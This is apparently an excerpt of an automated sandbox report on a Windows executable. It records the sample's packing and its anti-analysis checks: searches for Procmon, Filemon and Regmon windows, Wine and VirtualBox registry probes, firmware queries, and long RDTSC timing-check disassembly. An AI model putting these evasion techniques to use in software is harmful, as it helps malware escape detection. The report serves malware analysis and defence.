                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016ACE10 pushad ; iretd 0_3_016ACE11
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AD0E0 pushad ; iretd 0_3_016AD0E1
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AD2D8 pushad ; iretd 0_3_016AD2D9
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AFA8F push 00000001h; iretd 0_3_016AFAA0
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AFA81 push 00000001h; iretd 0_3_016AFAA0
                Source: jSFUzuYPG9.exe Static PE information: section name: entropy: 7.9813529381203026

                Boot Survival

                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4C606 second address: E4C622 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F158h 0x00000008 jmp 00007F4BA0D3F15Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4C622 second address: E4C65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F4BA0D39716h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4BA0D39706h 0x00000014 jmp 00007F4BA0D39713h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4C65A second address: E4C660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4CBB2 second address: E4CBE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4BA0D39719h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4BA0D3970Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4E6CA second address: E4E6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4EAA2 second address: E4EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4EF9E second address: E4EFD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov edi, dword ptr [ebp+122D2AF7h] 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4BA0D3F156h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F1BF second address: E4F1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F4BB second address: E4F502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 pushad 0x00000024 js 00007F4BA0D3F157h 0x0000002a stc 0x0000002b adc ch, FFFFFFF5h 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F4BA0D3F15Eh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F502 second address: E4F508 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F508 second address: E4F50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F9FB second address: E4F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E4F9FF second address: E4FA17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50444 second address: E5044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5044A second address: E5047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4BA0D3F165h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E515B5 second address: E515B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50C60 second address: E50C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50C64 second address: E50C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50C68 second address: E50C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52C7B second address: E52C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52C8B second address: E52C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D29 second address: E52D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D2D second address: E52D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D31 second address: E52D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D37 second address: E52D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E52D3D second address: E52D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E54E3E second address: E54EDA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F158h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F4BA0D3F158h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jne 00007F4BA0D3F16Eh 0x0000002f mov dword ptr [ebp+122D2848h], edx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F4BA0D3F158h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 jmp 00007F4BA0D3F166h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c jmp 00007F4BA0D3F15Ch 0x00000061 pop eax 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E581C1 second address: E581F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 mov bx, 7DB9h 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+1246C301h] 0x00000015 push 00000000h 0x00000017 mov bl, CAh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D39712h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E581F1 second address: E581F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E581F5 second address: E581FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59051 second address: E59068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59F0A second address: E59F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59F0E second address: E59F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59F14 second address: E59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5AEBE second address: E5AEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jc 00007F4BA0D3F156h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5AEDE second address: E5AEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5833C second address: E58342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5A090 second address: E5A09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4BA0D39706h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5B13E second address: E5B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5913B second address: E59142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5D0BF second address: E5D0DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5DF22 second address: E5DF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D39706h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F4BA0D3971Fh 0x00000012 pushad 0x00000013 jmp 00007F4BA0D39711h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E59201 second address: E59205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5D0DA second address: E5D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F4BA0D39708h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov di, C9A0h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov edi, 4862E83Ah 0x0000003b mov eax, dword ptr [ebp+122D0A21h] 0x00000041 jmp 00007F4BA0D39710h 0x00000046 push FFFFFFFFh 0x00000048 push eax 0x00000049 add bx, 3F2Bh 0x0000004e pop ebx 0x0000004f nop 0x00000050 pushad 0x00000051 jmp 00007F4BA0D39713h 0x00000056 jng 00007F4BA0D39708h 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e popad 0x0000005f push eax 0x00000060 push esi 0x00000061 pushad 0x00000062 push edx 0x00000063 pop edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5E059 second address: E5E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5E05E second address: E5E075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4BA0D3970Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF6E second address: E5FF78 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D3F15Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF78 second address: E5FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF85 second address: E5FF8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E5FF8F second address: E5FF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E6313E second address: E63143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E63143 second address: E63149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E63149 second address: E6315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F15Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E6315F second address: E63164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E601EC second address: E601F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E62249 second address: E6224F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E6224F second address: E62253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E650C5 second address: E65112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4BA0D39713h 0x0000000c popad 0x0000000d jmp 00007F4BA0D39719h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4BA0D3970Ah 0x0000001b pushad 0x0000001c jnc 00007F4BA0D39706h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E65112 second address: E65117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66811 second address: E668B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 jmp 00007F4BA0D3970Dh 0x00000015 popad 0x00000016 jmp 00007F4BA0D39716h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F4BA0D39708h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 jmp 00007F4BA0D39711h 0x0000003c mov dword ptr [ebp+122D280Dh], ebx 0x00000042 push 00000000h 0x00000044 mov ebx, 2259C726h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F4BA0D39708h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D1F09h], esi 0x0000006b xchg eax, esi 0x0000006c push ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F4BA0D39706h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E658EC second address: E658F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67A2E second address: E67A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67A32 second address: E67A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F163h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66B54 second address: E66B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39710h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66B6C second address: E66B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E66B7A second address: E66B80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E68B25 second address: E68B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E68B2B second address: E68B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67BC8 second address: E67BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E67BCC second address: E67BDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F4BA0D39706h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E70A53 second address: E70A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E70A58 second address: E70A5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E70E41 second address: E70E4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E75581 second address: E75587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7561F second address: E75623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7570B second address: E75750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F4BA0D39706h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F4BA0D39715h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F4BA0D39715h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E75750 second address: E75754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E75754 second address: E75758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A35D second address: E7A36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4BA0D3F156h 0x0000000a jnc 00007F4BA0D3F156h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A36E second address: E7A378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4BA0D39706h 0x0000000a rdtsc
